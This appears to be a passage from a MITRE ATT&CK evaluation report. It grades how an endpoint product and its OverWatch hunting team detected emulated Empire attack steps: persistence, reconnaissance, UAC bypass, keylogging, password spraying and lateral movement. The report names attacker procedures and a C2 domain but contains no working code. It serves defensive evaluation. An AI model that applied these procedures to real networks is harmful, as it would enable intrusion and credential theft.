Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed cmd.exe running autoupdate.bat from the Startup folder.
Telemetry showing cmd.exe running autoupdate.bat from Startup folder
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe starting updater.dll. The telemetry was tainted by the parent OverWatch alert.
Telemetry showing rundll32.exe executing updater.dll (tainted by the parent OverWatch alert)
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed the remote connection to Conficker for a user logon by Jesse with type 10 (interactive) as well as the use of rdpclip.exe by the logged-on user.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior occurred because they observed suspicious communications over 3389 (RDP) to other hosts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing user logon by Jesse to Conficker with type 10 (interactive logon)
Telemetry showing logged-on user activity, including the use of rdpclip.exe
Email excerpt from the OverWatch team indicating suspicious communications over 3389 (RDP) were observed (General Behavior)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed a type 10 (interactive) UserLogon event for Jesse.
Telemetry showing user logon by Jesse to Conficker
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
  
A Specific Behavior alert was generated indicating "A PowerShell script launched that shares characteristics with known PowerShell exploit kits."
General Behavior (Delayed)
  
 
A General Behavior alert was generated from OverWatch indicating wscript.exe executing launcher.vbs was suspicious. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed wscript.exe executing launcher.vbs, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a Specific Behavior was observed because a malicious script invoked by wscript was run by Bob on CodeRed and launched PowerShell. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Specific Behavior alert for PowerShell sharing characteristics with known exploit kits
General Behavior alert from OverWatch for wscript.exe executing launcher.vbs was suspicious
Email excerpt from the OverWatch team indicating a malicious script was run (Specific Behavior)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe making connection to 192.168.0.5 (C2 server) over port 443. The telemetry was tainted by an alert on its parent powershell.exe process.
Telemetry showing powershell.exe making a network connection over port 443 (tainted by parent powershell.exe high severity alert indicated by red icon)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic).
Telemetry showing powershell.exe making a network connection over port 443 (does not count as a detection)
Standard Cryptographic Protocol
(T1032)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic).
Telemetry showing powershell.exe making a network connection over port 443 (does not count as a detection)
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing route.exe with command-line arguments. The process tree view showed route.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because route print was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing route.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating route print was part of basic reconnaissance activity (General Behavior)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The process tree view showed ipconfig.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because ipconfig was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing ipconfig.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating ipconfig was part of basic reconnaissance activity (General Behavior)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating whoami.exe with command-line arguments was suspicious. The process tree view showed whoami.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed powershell.exe executing whoami.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because whoami was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert and telemetry indicating whoami.exe with command-line arguments was suspicious (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating whoami was part of basic reconnaissance activity (General Behavior)
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating qprocess.exe with command-line arguments was suspicious. The process tree view showed qprocess.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service.
Telemetry
  
Telemetry within the OverWatch alert showed execution of qprocess.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because qprocess was part of the basic reconnaissance activity performed performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
OverWatch General Behavior alert and telemetry indicating qprocess.exe with command-line arguments was suspicious (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating qprocess was part of basic reconnaissance activity (General Behavior)
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe and net1.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net start was part of the basic reconnaissance activity performed performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net start was part of basic reconnaissance activity (General Behavior)
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Telemetry
  
Telemetry showed the PowerShell script (.ps1) being written to the temp folder.
Specific Behavior (Delayed)
  
 
The OverWatch team generated a Specific Behavior alert indicating the PowerShell script was malicious. OverWatch is the managed threat hunting service.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating they identified a Specific Behavior for an unidentified PowerShell script running. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing the temp write of the ps1 script
OverWatch Specific Behavior alert indicating the PowerShell script was malicious
Email excerpt from OverWatch team indicating they observed an unidentified PowerShell script running (Specific Behavior)
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
None
  
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
None
  
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command and OverWatch alerted on it as suspicious. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability.
Telemetry showing encoded PowerShell, which decodes to show Windows.Clipboard details (does not count as a detection)
Decoding (outside the capability) of encoded PowerShell command to show Windows.Clipboard details (does not count as a detection)
OverWatch alert indicating encoded PowerShell was suspicious (does not count as a detection)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Telemetry
  
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function.
Telemetry showing the Get-Sysinfo function
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
Telemetry
  
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function.
Telemetry showing the Get-Sysinfo function
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
  
No detection capability demonstrated for this procedure.
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection.
Telemetry from process tree showing netstat.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
Enrichment (Tainted)
  
 
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery) (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net group was part of additional malicious discovery activity (General Behavior)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net localgroup was part of additional malicious discovery activity (General Behavior)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net user was part of additional malicious discovery activity (General Behavior)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net user was part of additional malicious discovery activity (General Behavior)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
Enrichment (Tainted)
  
 
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed the enrichment was tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Enrichment of net.exe with related ATT&CK Technique (Account Discovery) and correct Tactic (Discovery) (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net group was part of additional malicious discovery activity (General Behavior)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because net use was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating net use was part of additional malicious discovery activity (General Behavior)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed netstat.exe executing with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because netstat was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing netstat.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Email excerpt from the OverWatch team indicating netstat was part of additional malicious discovery activity (General Behavior)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert identifying reg.exe execution as suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because reg query was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing reg.exe with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
OverWatch General Behavior alert indicating reg query was suspicious (tainted by previous powershell.exe detection by orange line indicating medium severity)
OverWatch General Behavior alert indicating reg query was suspicious
Email excerpt from the OverWatch team indicating reg query was part of additional malicious discovery activity (General Behavior)
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry
  
Telemetry showed an integrity level change through a query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000), which is indicative of bypassing UAC. Telemetry also showed the Invoke-BypassUACTokenManipulation function in the script.
Specific Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a Specific Behavior was observed because a base64 obfuscated PowerShell command was used to invoke UAC bypass. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing integrity level change through query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000)
Telemetry showing the Invoke-BypassUACTokenManipulation function
Email excerpt from the OverWatch team indicating obfuscated PowerShell invoked UAC bypass (Specific Behavior)
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed a network connection event to 192.168.0.5 (C2 server) on TCP port 8080 that was associated with the encoded PowerShell IEX command.
Telemetry showing IEX connection over to 192.168.0.5 (C2 server) on TCP port 8080
Remote File Copy
(T1105)
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because PowerShell retrieved the file wdbypass from www.freegoogleadsenseinfo.com (C2 domain) over port 8080. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Email excerpt from the OverWatch team indicating PowerShell retrieved the file wdbypass (Specific Behavior)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080.
Telemetry showing encoded PowerShell command that decodes to show HTTP traffic (does not count as a detection)
Decoded PowerShell (outside of capability) showing download request over HTTP (does not count as a detection)
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
Telemetry
  
Telemetry showed the decoded PowerShell script, which displayed the API call GetForegroundWindow to enumerate the active window.
Telemetry showing decoded PowerShell script containing the API call GetForegroundWindow
Input Capture
(T1056)
Telemetry
  
Telemetry showed the decoded PowerShell script, which displayed the function Get-Keystrokes.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was identified because they observed the adversary logging keystrokes based on the GetKeystrokes PowerShell function. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing decoded PowerShell script containing the function Get-Keystrokes
Excerpt from email sent by OverWatch team indicating keylogging activity occurred (Specific Behavior)
Excerpt from email sent by OverWatch team indicating IT_tasks.txt was retrieved as a file of interest (General Behavior)
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
Telemetry
  
Telemetry showed a file read event for IT_tasks.txt by powershell.exe as well as a FsPostOpen event indicating IT_tasks.txt was opened.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because IT_tasks.txt was retrieved from a network share as a file of interest. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing file read event for IT_tasks.txt
Telemetry showing FsPostOpen event for IT_tasks.txt
Excerpt from email sent by OverWatch team indicating IT_tasks.txt was retrieved as a file of interest (General Behavior)
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Telemetry
  
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, including details that the logons were for local admin (type 6) and that they failed.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated General Behavior alerts indicating the net use commands were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net.exe logon attempts
Telemetry showing details for the logon attempt into the 10.0.1.4 (Morris) showing UserLogonFlags_decimal is equal to 6 (attempt for local admin) and UserLogonFailed (no distinction between authentication failure and authorization failure)
Telemetry showing details for the logon attempt into the 10.0.1.6 (Nimda) showing UserLogonFlags_decimal is equal to 6 (attempt for local admin) and UserLogonFailed (no distinction between authentication failure and authorization failure)
Process tree view of OverWatch General Behavior alerts indicating net.exe commands were suspicious (net.exe command details not specifically shown, tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally (General Behavior)
Windows Admin Shares
(T1077)
Telemetry
  
Telemetry showed repeated logon attempts via net.exe with command-line arguments targeting ADMIN$ shares on the machines 10.0.1.4 (Morris) and 10.0.1.6 (Nimda).
General Behavior (Delayed, Tainted)
  
  
OverWatch generated General Behavior alerts indicating the net use commands attempting logon to ADMIN$ shares were suspicious. The alerts were tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing net use logon attempts to ADMIN$ shares
Process tree view of OverWatch General Behavior alerts indicating net.exe commands were suspicious (net.exe command details not specifically shown, tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally to access network resources (General Behavior)
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to connect to ADMIN$ on 10.0.0.5 (Conficker) as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a previous powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the successful net use connection to ADMIN$ was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing successful net use connection to ADMIN$ (tainted by previous powershell.exe detection by red line indicating high severity. The vendor noted the process tree view and severities change as detections occur.)
OverWatch General Behavior alert indicating successful net use connection to ADMIN$ was suspicious (would be tainted by previous powershell.exe detection by orange line indicating medium severity in process tree view that is not shown)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally to access network resources (General Behavior)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.  
Telemetry from process tree showing successful net.exe connection using valid credentials of Kmitnick (tainted by previous powershell.exe detection by red line indicating high severity. The vendor noted the process tree view and severities change as detections occur.)
OverWatch General Behavior alert indicating successful net use connection by Kmitnick was suspicious (would be tainted by previous powershell.exe detection by orange line indicating medium severity in process tree view that is not shown)
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments to connect as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection.
General Behavior (Delayed, Tainted)
  
  
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service.
General Behavior (Delayed)
  
 
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing successful net.exe connection by Kmitnick (tainted by previous powershell.exe detection by red line indicating high severity. The vendor noted the process tree view and severities change as detections occur.)
OverWatch General Behavior alert indicating successful net use connection by Kmitnick was suspicious (would be tainted by previous powershell.exe detection by orange line indicating medium severity in process tree view that is not shown)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally (General Behavior)
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry (Tainted)
  
 
Telemetry showed net.exe executing with command-line arguments. The telemetry was tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob removed an artifact for the ADMIN$ share. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing net.exe executing with command-line arguments (tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating they observed ADMIN$ artifact removed (General Behavior)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on 10.0.0.4 (Creeper) as the user Kmitnick. The telemetry was tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing process tree containing successful net use connection to C$ (tainted by previous powershell.exe detection by red line indicating high severity)
Excerpt from email sent by OverWatch team indicating Bob attempted to move laterally to access network resources (General Behavior)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on Creeper as the user Kmitnick. The process tree view showed net.exe as tainted by a previous powershell.exe detection.
Telemetry showing successful net use connection by Kmitnick in the process tree view (tainted by previous powershell.exe detection by red line indicating high severity)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed File Write and New Script Write events for autoupdate.vbs under powershell.exe. The telemetry was tainted by a previous detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a General Behavior was observed because a .vbs was written to the filesystem, which was likely used to carry out additional actions. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry showing File Write and New Script Write for autoupdate.vbs within powershell.exe (tainted by previous detection by orange line indicating medium severity)
Excerpt from email sent by OverWatch team indicating they observed autoupdate.vbs written (General Behavior)
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
  
 
Telemetry showed a new cmd.exe process running wscript.exe as user Kmitnick, which then launched powershell.exe. The command line arguments for cmd.exe showed that autoupdate.vbs was run. The telemetry was tainted by a previous detection.
Telemetry showing cmd.exe launching autoupdate.vbs as user Kmitnick (tainted by previous detection by red line indicating high severity)
Telemetry showing wscript.exe launching autoupdate.vbs as user Kmitnick (tainted by previous detection by red line indicating high severity)
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry
  
Telemetry showed update.vbs written to the C$ remote share on host 10.0.0.4 (Creeper).
Telemetry showing update.vbs with event_name NewScriptWritten indicating a write to C$
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed execution of sc.exe to query services on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
Specific Behavior (Delayed)
  
 
The OverWatch team sent an email indicating a Specific Behavior was observed because the user Bob was querying for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing sc.exe execution to query services on Creeper (tainted from previous powershell.exe detection by red line indicating high severity)
Email excerpt sent by OverWatch team indicating they observed Bob querying for a service on Creeper (Specific Behavior)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates." The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
General Behavior (Delayed)
  
 
The OverWatch team sent an email indicating they observed a General Behavior because newly created file (AdobeUpdater service in registry) established persistence on the host. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident.
Telemetry from process tree showing sc.exe execution to create the AdobeUpdater service (tainted from previous powershell.exe detection by red line indicating high severity)
Telemetry showing AdobeUpdater service details with binPath pointed to cmd.exe with arguments and service description
Email excerpt sent by OverWatch team indicating they observed a newly created file (AdobeUpdater service in registry) to establish persistence (General Behavior)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description "Synchronize with Adobe for security updates.". An analyst could use this information to determine it is not a legitimate service. The process tree view showed sc.exe as tainted by a previous powershell.exe detection.
